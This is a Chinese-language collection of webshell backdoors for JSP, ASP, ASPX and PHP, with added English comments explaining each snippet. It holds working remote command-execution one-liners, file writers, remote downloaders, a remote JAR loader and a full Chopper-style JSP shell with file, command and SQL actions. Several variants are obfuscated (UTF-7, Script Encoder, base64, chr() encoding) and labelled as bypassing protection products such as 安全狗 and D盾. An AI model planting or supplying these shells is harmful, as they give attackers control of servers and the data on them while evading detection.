后门木马整理

2019/07/12 15:41

JSP:

无回显(http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls)

<%-- No-output variant: the value of request parameter "i" is handed to Runtime.exec() as a command line and the Process object is dropped, so nothing from the child is read back into the response. --%>
<%Runtime.getRuntime().exec(request.getParameter("i"));%>

有回显 (http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls)

<%-- Echo variant: only when parameter "pwd" equals the hard-coded "023" is parameter "i" executed; the child's stdout is copied into the response inside <pre>, stderr is never read, and bytes are decoded with the platform default charset (new String(b,0,a)). The "<pre>"/"</pre>" string literals are shown split across two listing lines below; that looks like page rendering rather than the original source. --%>
1 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("
2 <pre>");
3         while((a=in.read(b))!=-1){
4             out.println(new String(b,0,a));
5         }
6         out.print("</pre>
7 ");
8     }
9 %>

客户端写入:

http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

<%-- Writes the raw bytes of parameter "c" (platform default charset) to the absolute path given in parameter "f"; the FileOutputStream is never closed. --%>
1 <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>

http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

<%-- Same writer as the absolute-path version, but "f" is appended to the web application's real root (application.getRealPath("/") + "/") with no normalization of the resulting path; the stream is never closed. --%>
1 <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>

http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

<%-- RandomAccessFile("rw") variant: opens (or creates) the absolute path in "f" and writes "c" at offset 0 without truncating, so a pre-existing file longer than "c" keeps its trailing bytes. The file is never closed. --%>
1 <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>

http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234 

<%-- Webroot-relative RandomAccessFile("rw") writer: path is application.getRealPath("/") + "/" + "f" (no normalization); "c" is written at offset 0 without truncation and the file is never closed. --%>
1 <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>

反射调用外部jar:

http://192.168.16.240:8080/Shell/reflect.jsp?u=http://javaweb.org/Cat.jar&023=A 

<%-- Remote class loading: builds a URLClassLoader over the URL in parameter "u", loads and initializes a class named "Load" from it, and invokes the first element of getMethods() (the Class API does not specify that order) with a null receiver, i.e. as a static method, passing the whole request parameter map. Because this is a <%= %> expression, the method's return value is rendered into the page. --%>
1 <%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>

 

常规:

<%-- Writes parameter "t" to application.getRealPath("\") + "f" (single-backslash root, i.e. a Windows-style path) only when "f" is present; the FileOutputStream is never closed. --%>
1 <%
2 if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
3 %>
  1 <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
  2 <%!String Pwd = "pass";
        // Pwd is never compared against anything: it is the NAME of the request parameter whose
        // value (a single letter A..Q) selects the action in the scriptlet at the bottom of this
        // file (request.getParameter(Pwd)). Nothing else in the file checks who the caller is.
  3 
        // Charset re-decoding hook left disabled: the intended body survives only in the
        // trailing comment on the closing line. As written it returns s unchanged and c is unused.
  4     String EC(String s, String c) throws Exception {
  5         return s;
  6     }//new String(s.getBytes("ISO-8859-1"),c);}
  7 
        // Opens a JDBC connection from a CRLF-separated spec: line 0 = driver class loaded via
        // Class.forName, line 1 = JDBC URL handed to DriverManager, optional line 2 = catalog.
        // Driver name and URL are used verbatim from the spec; a spec with fewer than two CRLF-
        // separated lines fails at x[1] with an ArrayIndexOutOfBoundsException.
  8     Connection GC(String s) throws Exception {
  9         String[] x = s.trim().split("\r\n");
 10         Class.forName(x[0].trim()).newInstance();
 11         Connection c = DriverManager.getConnection(x[1].trim());
 12         if (x.length > 2) {
 13             c.setCatalog(x[2].trim());
 14         }
 15         return c;
 16     }
 17 
        // Appends the first two characters of every filesystem root (e.g. "C:" on Windows) to sb.
        // The dispatcher only calls this when the script's directory does not start with "/".
 18     void AA(StringBuffer sb) throws Exception {
 19         File r[] = File.listRoots();
 20         for (int i = 0; i < r.length; i++) {
 21             sb.append(r[i].toString().substring(0, 2));
 22         }
 23     }
 24 
        // Directory listing of path s: one line per entry with name, last-modified time, length
        // and R/W flags. Directories go to sb immediately (name suffixed with "/"); plain files are
        // collected in sF and appended after them.
        // NOTE(review): listFiles() returns null when s is not a directory, so l.length throws
        // here and the dispatcher's catch turns that into an "ERROR://" line.
 25     void BB(String s, StringBuffer sb) throws Exception {
 26         File oF = new File(s), l[] = oF.listFiles();
 27         String sT, sQ, sF = "";
 28         java.util.Date dt;
 29         SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
 30         for (int i = 0; i < l.length; i++) {
 31             dt = new java.util.Date(l[i].lastModified());
 32             sT = fm.format(dt);
 33             sQ = l[i].canRead() ? "R" : "";
 34             sQ += l[i].canWrite() ? " W" : "";
 35             if (l[i].isDirectory()) {
 36                 sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
 37                         + "\t" + sQ + "\n");
 38             } else {
 39                 sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
 40                         + sQ + "\n";
 41             }
 42         }
 43         sb.append(sF);
 44     }
 45 
        // Recursive delete: for a directory each child is delete()d and, when that fails (a
        // non-empty subdirectory), EE recurses into it; finally s itself is deleted. Every
        // delete() result is ignored, so failures are silent.
 46     void EE(String s) throws Exception {
 47         File f = new File(s);
 48         if (f.isDirectory()) {
 49             File x[] = f.listFiles();
 50             for (int k = 0; k < x.length; k++) {
 51                 if (!x[k].delete()) {
 52                     EE(x[k].getPath());
 53                 }
 54             }
 55         }
 56         f.delete();
 57     }
 58 
        // Streams the file at path s straight into the HTTP response: reset() discards any
        // buffered output, then the raw bytes are sent framed by the 3-byte markers "->|" and
        // "|<-". The dispatcher below wraps its text responses in the same markers, so this
        // framing is a stable, content-independent indicator of the shell's traffic.
 59     void FF(String s, HttpServletResponse r) throws Exception {
 60         int n;
 61         byte[] b = new byte[512];
 62         r.reset();
 63         ServletOutputStream os = r.getOutputStream();
 64         BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
 65         os.write(("->" + "|").getBytes(), 0, 3);
 66         while ((n = is.read(b, 0, 512)) != -1) {
 67             os.write(b, 0, n);
 68         }
 69         os.write(("|" + "<-").getBytes(), 0, 3);
 70         os.close();
 71         is.close();
 72     }
 73 
        // Binary file writer: d is a hex string (two characters per byte) decoded through the
        // uppercase alphabet h and written byte by byte to path s, which is created first.
        // Characters outside h (including lowercase hex digits) make indexOf() return -1 and so
        // silently produce wrong bytes instead of an error.
 74     void GG(String s, String d) throws Exception {
 75         String h = "0123456789ABCDEF";
 76         int n;
 77         File f = new File(s);
 78         f.createNewFile();
 79         FileOutputStream os = new FileOutputStream(f);
 80         for (int i = 0; i < d.length(); i += 2) {
 81             os
 82                     .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
 83                             .charAt(i + 1))));
 84         }
 85         os.close();
 86     }
 87 
        // Recursive copy of s to d: a directory is recreated at d (mkdir result ignored) and
        // walked entry by entry; a plain file is copied in 512-byte chunks. Streams are closed
        // only on the success path (no try/finally).
 88     void HH(String s, String d) throws Exception {
 89         File sf = new File(s), df = new File(d);
 90         if (sf.isDirectory()) {
 91             if (!df.exists()) {
 92                 df.mkdir();
 93             }
 94             File z[] = sf.listFiles();
 95             for (int j = 0; j < z.length; j++) {
 96                 HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
 97             }
 98         } else {
 99             FileInputStream is = new FileInputStream(sf);
100             FileOutputStream os = new FileOutputStream(df);
101             int n;
102             byte[] b = new byte[512];
103             while ((n = is.read(b, 0, 512)) != -1) {
104                 os.write(b, 0, n);
105             }
106             is.close();
107             os.close();
108         }
109     }
110 
        // Moves/renames s to d with File.renameTo(); the boolean result is discarded, so the
        // dispatcher still reports "1" (success) when the rename did nothing.
111     void II(String s, String d) throws Exception {
112         File sf = new File(s), df = new File(d);
113         sf.renameTo(df);
114     }
115 
        // Creates a single directory at s; the mkdir() result is ignored.
116     void JJ(String s) throws Exception {
117         File f = new File(s);
118         f.mkdir();
119     }
120 
        // Rewrites the last-modified time of s to t, parsed as "yyyy-MM-dd HH:mm:ss" in the JVM
        // default time zone (timestamp manipulation). setLastModified()'s result is ignored.
121     void KK(String s, String t) throws Exception {
122         File f = new File(s);
123         SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
124         java.util.Date dt = fm.parse(t);
125         f.setLastModified(dt.getTime());
126     }
127 
        // Downloads URL s to local path d over HttpURLConnection in 512-byte chunks. The
        // FileOutputStream is opened before the connection is made, so a failed fetch still
        // leaves an empty file at d; nothing is closed if an exception is thrown mid-transfer.
128     void LL(String s, String d) throws Exception {
129         URL u = new URL(s);
130         int n;
131         FileOutputStream os = new FileOutputStream(d);
132         HttpURLConnection h = (HttpURLConnection) u.openConnection();
133         InputStream is = h.getInputStream();
134         byte[] b = new byte[512];
135         while ((n = is.read(b, 0, 512)) != -1) {
136             os.write(b, 0, n);
137         }
138         os.close();
139         is.close();
140         h.disconnect();
141     }
142 
        // Appends every line of is to sb, each terminated with CRLF. Decoding uses the platform
        // default charset (no charset passed to InputStreamReader) and the reader is never
        // closed. The dispatcher feeds it a child process's stdout and then its stderr.
143     void MM(InputStream is, StringBuffer sb) throws Exception {
144         String l;
145         BufferedReader br = new BufferedReader(new InputStreamReader(is));
146         while ((l = br.readLine()) != null) {
147             sb.append(l + "\r\n");
148         }
149     }
150 
        // Lists the catalogs (databases) reported by DatabaseMetaData.getCatalogs() on the
        // connection described by spec s, tab-separated. Resources are closed only on success.
151     void NN(String s, StringBuffer sb) throws Exception {
152         Connection c = GC(s);
153         ResultSet r = c.getMetaData().getCatalogs();
154         while (r.next()) {
155             sb.append(r.getString(1) + "\t");
156         }
157         r.close();
158         c.close();
159     }
160 
        // Lists the names of every object of type TABLE matching "%" in any catalog/schema the
        // connection can see, tab-separated. Resources are closed only on success.
161     void OO(String s, StringBuffer sb) throws Exception {
162         Connection c = GC(s);
163         String[] t = { "TABLE" };
164         ResultSet r = c.getMetaData().getTables(null, null, "%", t);
165         while (r.next()) {
166             sb.append(r.getString("TABLE_NAME") + "\t");
167         }
168         r.close();
169         c.close();
170     }
171 
        // Describes the columns of one table: the 4th CRLF-separated line of s (x[3]) is
        // concatenated straight into "select * from " + x[3], the full select is executed, and
        // each column's name and type name is appended. The literals 1005/1007 are the JDBC
        // ResultSet constants TYPE_SCROLL_SENSITIVE / CONCUR_READ_ONLY.
172     void PP(String s, StringBuffer sb) throws Exception {
173         String[] x = s.trim().split("\r\n");
174         Connection c = GC(s);
175         Statement m = c.createStatement(1005, 1007);
176         ResultSet r = m.executeQuery("select * from " + x[3]);
177         ResultSetMetaData d = r.getMetaData();
178         for (int i = 1; i <= d.getColumnCount(); i++) {
179             sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
180                     + ")\t");
181         }
182         r.close();
183         m.close();
184         c.close();
185     }
186 
        // Runs an arbitrary SQL string q on the connection described by s. First attempt: as a
        // query, writing column headers and then rows "\t|\t"-separated with CRLF line ends,
        // each cell passed through EC() (which currently returns it unchanged; cs is otherwise
        // unused). If executeQuery throws for ANY reason, the catch retries the same text with
        // executeUpdate(), so a failed read is re-attempted as a write. 1005/1008 are the JDBC
        // ResultSet constants TYPE_SCROLL_SENSITIVE / CONCUR_UPDATABLE.
187     void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
188         int i;
189         Connection c = GC(s);
190         Statement m = c.createStatement(1005, 1008);
191         try {
192             ResultSet r = m.executeQuery(q);
193             ResultSetMetaData d = r.getMetaData();
194             int n = d.getColumnCount();
195             for (i = 1; i <= n; i++) {
196                 sb.append(d.getColumnName(i) + "\t|\t");
197             }
198             sb.append("\r\n");
199             while (r.next()) {
200                 for (i = 1; i <= n; i++) {
201                     sb.append(EC(r.getString(i), cs) + "\t|\t");
202                 }
203                 sb.append("\r\n");
204             }
205             r.close();
206         } catch (Exception e) {
207             sb.append("Result\t|\t\r\n");
208             try {
209                 m.executeUpdate(q);
210                 sb.append("Execute Successfully!\t|\t\r\n");
211             } catch (Exception ee) {
212                 sb.append(ee.toString() + "\t|\t\r\n");
213             }
214         }
215         m.close();
216         c.close();
217     }%>
218      
219      
220 <%
        // Command dispatcher for the declarations above. Inputs: z0 = charset (default "gbk"),
        // the parameter named by Pwd ("pass") = one-letter action code, z1/z2 = action arguments.
        // Every text response is wrapped in "->|" ... "|<-" and any exception inside the try is
        // reported as "ERROR:// <exception>". Because "+ \"\"" turns a missing parameter into
        // the string "null", a request without the action parameter matches no branch and gets
        // the empty frame "->||<-" back.
221     String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
222     request.setCharacterEncoding(cs);
223     response.setContentType("text/html;charset=" + cs);
224     String Z = EC(request.getParameter(Pwd) + "", cs);
225     String z1 = EC(request.getParameter("z1") + "", cs);
226     String z2 = EC(request.getParameter("z2") + "", cs);
227     StringBuffer sb = new StringBuffer("");
228     try {
229         sb.append("->" + "|");
            // A: directory containing this JSP; on paths not starting with "/" also list drive roots.
230         if (Z.equals("A")) {
231             String s = new File(application.getRealPath(request
232                     .getRequestURI())).getParent();
233             sb.append(s + "\t");
234             if (!s.substring(0, 1).equals("/")) {
235                 AA(sb);
236             }
            // B: directory listing of z1.
237         } else if (Z.equals("B")) {
238             BB(z1, sb);
            // C: read text file z1 line by line (platform default charset) into the response.
239         } else if (Z.equals("C")) {
240             String l = "";
241             BufferedReader br = new BufferedReader(
242                     new InputStreamReader(new FileInputStream(new File(
243                             z1))));
244             while ((l = br.readLine()) != null) {
245                 sb.append(l + "\r\n");
246             }
247             br.close();
            // D: overwrite file z1 with text z2; "1" signals success.
248         } else if (Z.equals("D")) {
249             BufferedWriter bw = new BufferedWriter(
250                     new OutputStreamWriter(new FileOutputStream(
251                             new File(z1))));
252             bw.write(z2);
253             bw.close();
254             sb.append("1");
            // E: recursive delete of z1.
255         } else if (Z.equals("E")) {
256             EE(z1);
257             sb.append("1");
            // F: raw file download of z1; FF writes to the response itself, bypassing sb.
258         } else if (Z.equals("F")) {
259             FF(z1, response);
            // G: write hex-encoded z2 as binary file z1.
260         } else if (Z.equals("G")) {
261             GG(z1, z2);
262             sb.append("1");
            // H: copy z1 to z2.   I: move/rename z1 to z2.   J: mkdir z1.
263         } else if (Z.equals("H")) {
264             HH(z1, z2);
265             sb.append("1");
266         } else if (Z.equals("I")) {
267             II(z1, z2);
268             sb.append("1");
269         } else if (Z.equals("J")) {
270             JJ(z1);
271             sb.append("1");
            // K: set the mtime of z1 to z2.   L: fetch URL z1 into file z2.
272         } else if (Z.equals("K")) {
273             KK(z1, z2);
274             sb.append("1");
275         } else if (Z.equals("L")) {
276             LL(z1, z2);
277             sb.append("1");
            // M: run a process. argv = [ z1 from index 2, first two chars of z1, z2 ]: the program
            // path, a two-character option (presumably an interpreter switch) and the command
            // text. stdout is appended first, then stderr.
278         } else if (Z.equals("M")) {
279             String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
280             Process p = Runtime.getRuntime().exec(c);
281             MM(p.getInputStream(), sb);
282             MM(p.getErrorStream(), sb);
            // N/O/P/Q: database actions; z1 carries the CRLF-separated connection spec for GC().
            // N = list catalogs, O = list tables, P = describe columns, Q = run SQL z2.
283         } else if (Z.equals("N")) {
284             NN(z1, sb);
285         } else if (Z.equals("O")) {
286             OO(z1, sb);
287         } else if (Z.equals("P")) {
288             PP(z1, sb);
289         } else if (Z.equals("Q")) {
290             QQ(cs, z1, z2, sb);
291         }
292     } catch (Exception e) {
293         sb.append("ERROR" + ":// " + e.toString());
294     }
295     sb.append("|" + "<-");
296     out.print(sb.toString());
297 %>

 JSP后门连接:

<!-- Uploader client page: the form POSTs fields t (file body) and f (file name, default shell.jsp) to whatever address is typed into "url"; the textarea reproduces the matching server-side one-liner. In this copy the textarea shows getRealPath("\") whereas the same snippet earlier on the page has getRealPath("\\"), so the escaped backslash appears to have been lost here. -->
1 <html><head><title>JSP一句话木马客户端</title></head><div align=center>  <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text>  <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form>  <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>   </textarea>  </div></body>

 下载远程文件:

http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png

<%-- Downloads the URL in parameter "u" fully into memory (ByteArrayOutputStream) and then writes the bytes to the absolute path in parameter "f"; neither the URL stream nor the file stream is closed. --%>
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>

下载web路径:

http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png

<%-- Same downloader, but the target is application.getRealPath("/") + "/" + "f" (webroot-relative, no normalization); the whole body is buffered in memory first and neither stream is closed. --%>
1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>

 

ASP:

<%' Evaluates the body of request parameter "chopper" as VBScript. Knowing that parameter name is all a client needs; no other check is performed. %>
<%eval request("chopper")%>

常规:

 1 <%execute request("chopper")%>
 2 
 3 <%execute(request("chopper"))%>
 4 
 5 <%ExecuteGlobal request("chopper")%>
 6 
 7 <%Eval(Request(chr(35)))%>
 8 
 9 <%dy=request("c")%><%Eval(dy)%> 
10 
11 <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 
12 
13 <% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
14 
15 <%execute request("c")%><%'<% loop <%:%>
16 
17 < %'<% loop <%:%><%execute request("a")%>
18 
19 <script language=vbs runat=server>eval(request("c"))</script> 
20 
21 <script language=VBScript runat=server>execute request("#")</script> 
22 
23 <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
24 
25 <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
26 
27 <%execute(unescape("eval%20request%28%22aaa%22%29"))%>
UTF-7编码加密:
1 <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
 
Script Encoder 加密  //密码c
1 <%@ LANGUAGE = VBScript.Encode %>
2 <%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36 mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>

过雷客图:

 1 <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
 2 ms.Language="VBScript"
 3 ms.AddObject "Response", Response
 4 ms.AddObject "request", request
 5 ms.AddObject "session", session
 6 ms.AddObject "server", server
 7 ms.AddObject "application", application
 8 ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
 9 
10 <%
11 password=Request("class")
12 Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
13 %>
14 
15 
16 <%
17 password=Request("class")
18 Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
19 %>

 

ASPX:

常规免杀

1 <%@ Page Language="Jscript"%>
2 <%
3 var a = Request.Item["M"];
4 var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管
5 eval(a,b);
6 Response.Write("Test");
7 %>

绕过安全狗

 1 <%
 2 dim play
 3 '
 4 '
 5 ''''''''''''''''''
 6 '''''''''
 7 play = request("#")
 8 %>
 9 Error
10 <%
11 execute(play)
12 %>
1 <%@codepage=65000%>
2 <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>

过D盾:

 1 <%@ Page Language="Jscript" Debug=true%>
 2 <%
 3 var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));
 4 var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
 5 var c=eval(a,b);
 6 eval(c,b);
 7 
 8 %>
 9 
10  
11 
12 <%@ Page Language="Jscript" Debug=true%>
13 <%
14 var a=Request.Form["pass"];
15 var b="unsa",c="fe",d=b+c;
16 function fun()
17 {
18 return a;
19 }
20 eval(fun(),d);
21 %>

 

PHP:

常规:

1 <?php
// Runs the value of GET parameter "cmd" as a shell command and echoes its output (system()).
2 system($_GET['cmd']);
3 ?>

过D盾:

1 <?php
2 $ab = $_REQUEST['d'];
3 $a['t'] = "";
4 eval($a['t'].$ab);

过安全狗

1 <?php
2 $a = $_REQUEST['d'];
3 $a = "$a";
4 $b['test'] = "";
5 eval($b['test']."$a");

 
